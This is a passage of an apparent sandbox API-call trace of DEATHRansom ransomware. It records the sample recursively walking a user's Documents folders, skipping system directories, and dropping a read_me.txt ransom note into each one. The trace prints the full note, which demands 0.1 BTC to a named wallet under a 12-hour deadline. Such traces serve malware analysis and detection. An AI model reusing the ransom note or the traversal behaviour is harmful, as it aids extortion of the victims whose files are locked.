nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17d57c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17d57c*=0x6b3, lpOverlapped=0x0) returned 1 [0075.318] CloseHandle (hObject=0x7a4) returned 1 [0075.318] GetProcessHeap () returned 0x4f10000 [0075.318] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8c00108 | out: hHeap=0x4f10000) returned 1 [0075.318] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23149020, ftCreationTime.dwHighDateTime=0x1d4cb1c, ftLastAccessTime.dwLowDateTime=0x43f5c140, ftLastAccessTime.dwHighDateTime=0x1d4c85d, ftLastWriteTime.dwLowDateTime=0x43f5c140, ftLastWriteTime.dwHighDateTime=0x1d4c85d, nFileSizeHigh=0x0, nFileSizeLow=0x2457, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="QnKnm4tcyo8Rs.docx", cAlternateFileName="QNKNM4~1.DOC")) returned 1 [0075.318] wnsprintfW (in: pszDest=0x8bd00f0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\QnKnm4tcyo8Rs.docx") returned 96 [0075.318] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbba293c0, ftCreationTime.dwHighDateTime=0x1d4d524, ftLastAccessTime.dwLowDateTime=0x4be4fff0, ftLastAccessTime.dwHighDateTime=0x1d4c9cb, ftLastWriteTime.dwLowDateTime=0x4be4fff0, ftLastWriteTime.dwHighDateTime=0x1d4c9cb, nFileSizeHigh=0x0, nFileSizeLow=0xdfe6, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="_ak74NgfXD6KjNd l.ppt", cAlternateFileName="_AK74N~1.PPT")) returned 1 [0075.318] wnsprintfW (in: pszDest=0x8bd00f0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\_ak74NgfXD6KjNd l.ppt") returned 99 [0075.318] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbba293c0, ftCreationTime.dwHighDateTime=0x1d4d524, ftLastAccessTime.dwLowDateTime=0x4be4fff0, ftLastAccessTime.dwHighDateTime=0x1d4c9cb, ftLastWriteTime.dwLowDateTime=0x4be4fff0, ftLastWriteTime.dwHighDateTime=0x1d4c9cb, nFileSizeHigh=0x0, nFileSizeLow=0xdfe6, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="_ak74NgfXD6KjNd l.ppt", cAlternateFileName="_AK74N~1.PPT")) returned 0 [0075.318] FindClose (in: hFindFile=0x7cfe9e8 | out: hFindFile=0x7cfe9e8) returned 1 [0075.318] wnsprintfW (in: pszDest=0x8bd00f0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\read_me.txt") returned 89 [0075.318] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8bn0vyqigbef7_rt\\cxq6nutj 99v2-v6\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7b8 [0075.318] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.318] WriteFile (in: hFile=0x7b8, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17d7f4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17d7f4*=0x6b3, lpOverlapped=0x0) returned 1 [0075.319] CloseHandle (hObject=0x7b8) returned 1 [0075.320] GetProcessHeap () returned 0x4f10000 [0075.320] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8bd00f0 | out: hHeap=0x4f10000) returned 1 [0075.320] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9cbcf40, ftCreationTime.dwHighDateTime=0x1d4cfde, ftLastAccessTime.dwLowDateTime=0x7a1b5ae0, ftLastAccessTime.dwHighDateTime=0x1d4cfcf, ftLastWriteTime.dwLowDateTime=0x7a1b5ae0, ftLastWriteTime.dwHighDateTime=0x1d4cfcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="G_x-eHIang489Wx", cAlternateFileName="G_X-EH~1")) returned 1 [0075.320] wnsprintfW (in: pszDest=0x8ba00d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\G_x-eHIang489Wx") returned 76 [0075.320] lstrcmpW (lpString1="G_x-eHIang489Wx", lpString2="..") returned 1 [0075.320] lstrcmpW (lpString1="G_x-eHIang489Wx", lpString2=".") returned 1 [0075.320] StrStrW (lpFirst="g_x-ehiang489wx", lpSrch="programdata") returned 0x0 [0075.320] StrStrW (lpFirst="g_x-ehiang489wx", lpSrch="$recycle.bin") returned 0x0 [0075.320] StrStrW (lpFirst="g_x-ehiang489wx", lpSrch="program files") returned 0x0 [0075.320] StrStrW (lpFirst="g_x-ehiang489wx", lpSrch="windows") returned 0x0 [0075.320] StrStrW (lpFirst="g_x-ehiang489wx", lpSrch="all users") returned 0x0 [0075.320] StrStrW (lpFirst="g_x-ehiang489wx", lpSrch="appdata") returned 0x0 [0075.320] GetProcessHeap () returned 0x4f10000 [0075.320] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8bd00f0 [0075.320] lstrcpyW (in: lpString1=0x8bd00f0, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\G_x-eHIang489Wx" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\G_x-eHIang489Wx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\G_x-eHIang489Wx" [0075.320] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 50 [0075.320] QueueUserWorkItem (Function=0x40a710, Context=0x8bd00f0, Flags=0x0) returned 1 [0075.320] GetProcessHeap () returned 0x4f10000 [0075.320] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8a90050 [0075.320] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\G_x-eHIang489Wx\\*") returned 78 [0075.320] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\G_x-eHIang489Wx\\*", lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9cbcf40, ftCreationTime.dwHighDateTime=0x1d4cfde, ftLastAccessTime.dwLowDateTime=0x7a1b5ae0, ftLastAccessTime.dwHighDateTime=0x1d4cfcf, ftLastWriteTime.dwLowDateTime=0x7a1b5ae0, ftLastWriteTime.dwHighDateTime=0x1d4cfcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe9e8 [0075.320] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\G_x-eHIang489Wx\\.") returned 78 [0075.320] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.320] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.320] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9cbcf40, ftCreationTime.dwHighDateTime=0x1d4cfde, ftLastAccessTime.dwLowDateTime=0x7a1b5ae0, ftLastAccessTime.dwHighDateTime=0x1d4cfcf, ftLastWriteTime.dwLowDateTime=0x7a1b5ae0, ftLastWriteTime.dwHighDateTime=0x1d4cfcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.321] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\G_x-eHIang489Wx\\..") returned 79 [0075.321] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.321] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf012e300, ftCreationTime.dwHighDateTime=0x1d4c960, ftLastAccessTime.dwLowDateTime=0x6b5ef530, ftLastAccessTime.dwHighDateTime=0x1d4d58c, ftLastWriteTime.dwLowDateTime=0x6b5ef530, ftLastWriteTime.dwHighDateTime=0x1d4d58c, nFileSizeHigh=0x0, nFileSizeLow=0x2b64, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="3hM_Yv-O.ods", cAlternateFileName="")) returned 1 [0075.321] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\G_x-eHIang489Wx\\3hM_Yv-O.ods") returned 89 [0075.321] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d069cb0, ftCreationTime.dwHighDateTime=0x1d4d00b, ftLastAccessTime.dwLowDateTime=0x95e5ee30, ftLastAccessTime.dwHighDateTime=0x1d4caf1, ftLastWriteTime.dwLowDateTime=0x95e5ee30, ftLastWriteTime.dwHighDateTime=0x1d4caf1, nFileSizeHigh=0x0, nFileSizeLow=0x169c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="LIWzry.csv", cAlternateFileName="")) returned 1 [0075.321] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\G_x-eHIang489Wx\\LIWzry.csv") returned 87 [0075.321] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d069cb0, ftCreationTime.dwHighDateTime=0x1d4d00b, ftLastAccessTime.dwLowDateTime=0x95e5ee30, ftLastAccessTime.dwHighDateTime=0x1d4caf1, ftLastWriteTime.dwLowDateTime=0x95e5ee30, ftLastWriteTime.dwHighDateTime=0x1d4caf1, nFileSizeHigh=0x0, nFileSizeLow=0x169c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="LIWzry.csv", cAlternateFileName="")) returned 0 [0075.321] FindClose (in: hFindFile=0x7cfe9e8 | out: hFindFile=0x7cfe9e8) returned 1 [0075.321] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\G_x-eHIang489Wx\\read_me.txt") returned 88 [0075.321] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\G_x-eHIang489Wx\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8bn0vyqigbef7_rt\\g_x-ehiang489wx\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7b8 [0075.321] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.321] WriteFile (in: hFile=0x7b8, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17d7f4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17d7f4*=0x6b3, lpOverlapped=0x0) returned 1 [0075.323] CloseHandle (hObject=0x7b8) returned 1 [0075.323] GetProcessHeap () returned 0x4f10000 [0075.323] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8a90050 | out: hHeap=0x4f10000) returned 1 [0075.323] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6310cda0, ftCreationTime.dwHighDateTime=0x1d4c578, ftLastAccessTime.dwLowDateTime=0x7592e440, ftLastAccessTime.dwHighDateTime=0x1d4c7c6, ftLastWriteTime.dwLowDateTime=0x7592e440, ftLastWriteTime.dwHighDateTime=0x1d4c7c6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="l7IEr", cAlternateFileName="")) returned 1 [0075.323] wnsprintfW (in: pszDest=0x8ba00d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr") returned 66 [0075.323] lstrcmpW (lpString1="l7IEr", lpString2="..") returned 1 [0075.323] lstrcmpW (lpString1="l7IEr", lpString2=".") returned 1 [0075.323] StrStrW (lpFirst="l7ier", lpSrch="programdata") returned 0x0 [0075.323] StrStrW (lpFirst="l7ier", lpSrch="$recycle.bin") returned 0x0 [0075.323] StrStrW (lpFirst="l7ier", lpSrch="program files") returned 0x0 [0075.323] StrStrW (lpFirst="l7ier", lpSrch="windows") returned 0x0 [0075.323] StrStrW (lpFirst="l7ier", lpSrch="all users") returned 0x0 [0075.323] StrStrW (lpFirst="l7ier", lpSrch="appdata") returned 0x0 [0075.323] GetProcessHeap () returned 0x4f10000 [0075.324] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8a90050 [0075.324] lstrcpyW (in: lpString1=0x8a90050, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr" [0075.324] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 51 [0075.324] QueueUserWorkItem (Function=0x40a710, Context=0x8a90050, Flags=0x0) returned 1 [0075.324] GetProcessHeap () returned 0x4f10000 [0075.324] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8c00108 [0075.324] wnsprintfW (in: pszDest=0x8c00108, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\*") returned 68 [0075.324] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\*", lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6310cda0, ftCreationTime.dwHighDateTime=0x1d4c578, ftLastAccessTime.dwLowDateTime=0x7592e440, ftLastAccessTime.dwHighDateTime=0x1d4c7c6, ftLastWriteTime.dwLowDateTime=0x7592e440, ftLastWriteTime.dwHighDateTime=0x1d4c7c6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe9e8 [0075.324] wnsprintfW (in: pszDest=0x8c00108, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\.") returned 68 [0075.324] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.324] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.324] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6310cda0, ftCreationTime.dwHighDateTime=0x1d4c578, ftLastAccessTime.dwLowDateTime=0x7592e440, ftLastAccessTime.dwHighDateTime=0x1d4c7c6, ftLastWriteTime.dwLowDateTime=0x7592e440, ftLastWriteTime.dwHighDateTime=0x1d4c7c6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.324] wnsprintfW (in: pszDest=0x8c00108, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\..") returned 69 [0075.324] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.324] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x98d78e50, ftCreationTime.dwHighDateTime=0x1d4ca8d, ftLastAccessTime.dwLowDateTime=0x5ed295c0, ftLastAccessTime.dwHighDateTime=0x1d4d04f, ftLastWriteTime.dwLowDateTime=0x5ed295c0, ftLastWriteTime.dwHighDateTime=0x1d4d04f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="D n1NXFm_Av6aY4CwC", cAlternateFileName="DN1NXF~1")) returned 1 [0075.324] wnsprintfW (in: pszDest=0x8c00108, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\D n1NXFm_Av6aY4CwC") returned 85 [0075.324] lstrcmpW (lpString1="D n1NXFm_Av6aY4CwC", lpString2="..") returned 1 [0075.324] lstrcmpW (lpString1="D n1NXFm_Av6aY4CwC", lpString2=".") returned 1 [0075.324] StrStrW (lpFirst="d n1nxfm_av6ay4cwc", lpSrch="programdata") returned 0x0 [0075.324] StrStrW (lpFirst="d n1nxfm_av6ay4cwc", lpSrch="$recycle.bin") returned 0x0 [0075.324] StrStrW (lpFirst="d n1nxfm_av6ay4cwc", lpSrch="program files") returned 0x0 [0075.324] StrStrW (lpFirst="d n1nxfm_av6ay4cwc", lpSrch="windows") returned 0x0 [0075.324] StrStrW (lpFirst="d n1nxfm_av6ay4cwc", lpSrch="all users") returned 0x0 [0075.324] StrStrW (lpFirst="d n1nxfm_av6ay4cwc", lpSrch="appdata") returned 0x0 [0075.324] GetProcessHeap () returned 0x4f10000 [0075.324] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8c10110 [0075.324] lstrcpyW (in: lpString1=0x8c10110, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\D n1NXFm_Av6aY4CwC" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\D n1NXFm_Av6aY4CwC") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\D n1NXFm_Av6aY4CwC" [0075.325] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 52 [0075.325] QueueUserWorkItem (Function=0x40a710, Context=0x8c10110, Flags=0x0) returned 1 [0075.325] GetProcessHeap () returned 0x4f10000 [0075.325] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8c20118 [0075.325] wnsprintfW (in: pszDest=0x8c20118, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\D n1NXFm_Av6aY4CwC\\*") returned 87 [0075.325] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\D n1NXFm_Av6aY4CwC\\*", lpFindFileData=0x17d318 | out: lpFindFileData=0x17d318*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x98d78e50, ftCreationTime.dwHighDateTime=0x1d4ca8d, ftLastAccessTime.dwLowDateTime=0x5ed295c0, ftLastAccessTime.dwHighDateTime=0x1d4d04f, ftLastWriteTime.dwLowDateTime=0x5ed295c0, ftLastWriteTime.dwHighDateTime=0x1d4d04f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfea28 [0075.326] wnsprintfW (in: pszDest=0x8c20118, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\D n1NXFm_Av6aY4CwC\\.") returned 87 [0075.326] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.326] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.326] FindNextFileW (in: hFindFile=0x7cfea28, lpFindFileData=0x17d318 | out: lpFindFileData=0x17d318*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x98d78e50, ftCreationTime.dwHighDateTime=0x1d4ca8d, ftLastAccessTime.dwLowDateTime=0x5ed295c0, ftLastAccessTime.dwHighDateTime=0x1d4d04f, ftLastWriteTime.dwLowDateTime=0x5ed295c0, ftLastWriteTime.dwHighDateTime=0x1d4d04f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.326] wnsprintfW (in: pszDest=0x8c20118, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\D n1NXFm_Av6aY4CwC\\..") returned 88 [0075.326] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.326] FindNextFileW (in: hFindFile=0x7cfea28, lpFindFileData=0x17d318 | out: lpFindFileData=0x17d318*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4241dc50, ftCreationTime.dwHighDateTime=0x1d4cc66, ftLastAccessTime.dwLowDateTime=0x8f2e290, ftLastAccessTime.dwHighDateTime=0x1d4caaf, ftLastWriteTime.dwLowDateTime=0x8f2e290, ftLastWriteTime.dwHighDateTime=0x1d4caaf, nFileSizeHigh=0x0, nFileSizeLow=0xa268, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="CkixSmIJpPRf0.odp", cAlternateFileName="CKIXSM~1.ODP")) returned 1 [0075.326] wnsprintfW (in: pszDest=0x8c20118, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 